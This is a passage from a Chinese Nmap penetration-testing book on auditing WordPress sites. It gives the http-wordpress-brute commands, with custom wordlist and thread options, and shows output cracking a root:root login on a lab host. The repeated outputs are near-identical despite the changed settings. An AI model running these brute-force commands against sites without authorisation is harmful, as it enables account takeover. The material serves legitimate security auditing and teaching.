《Nmap渗透测试指南》—第9章9.3节审计Wordpress程序

本节书摘来自异步社区《Nmap渗透测试指南》一书中的第9章9.3节审计Wordpress程序，作者 商广明,更多章节内容可以访问云栖社区“异步社区”公众号查看。

9.3　审计Wordpress程序
表9.4所示为本章节所需Nmap命令表，表中加粗命令为本小节所需命令——审计Wordpress程序。

操作步骤
使用命令“nmap -p80 --script http-wordpress-brute 目标”即可审计Wordpress密码。

root@Wing:~# nmap -p80 --script http-wordpress-brute 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 12:32 CST
Nmap scan report for 192.168.126.131
Host is up (0.00023s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-wordpress-brute:
|　 Accounts
|　　 root:root => Login correct
|　 Statistics
|_　　Perfomed 103 guesses in 17 seconds, average tps: 6
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.16 seconds
root@Wing:~#

分析
http-wordpress-brute脚本可以很好地针对Wordpress程序进行审计，通过以上的结果，我们可以看到很快就可以破解出账号密码，这对于网站的管理员来说是一个非常不错的自身检测工具。

若需要自定字典则需要设置userdb、passdb选项指定相应的字典。

root@Wing:~# nmap -p80 --script http-wordpress-brute --script-args userdb=user.txt, passdb=passwd.txt 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 12:36 CST
Nmap scan report for 192.168.126.131
Host is up (0.00023s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-wordpress-brute:
|　 Accounts
|　　 root:root => Login correct
|　 Statistics
|_　　Perfomed 103 guesses in 17 seconds, average tps: 6
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 56.16 seconds
root@Wing:~# 
还可以设置线程数，减少破解的时间。

root@Wing:~# nmap -p80 --script http-wordpress-brute --script-args http-wordpress- brute.threads=10 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 12:40 CST
Nmap scan report for 192.168.126.131
Host is up (0.00023s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-wordpress-brute:
|　 Accounts
|　　 root:root => Login correct
|　 Statistics
|_　　Perfomed 103 guesses in 17 seconds, average tps: 6
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds
root@Wing:~#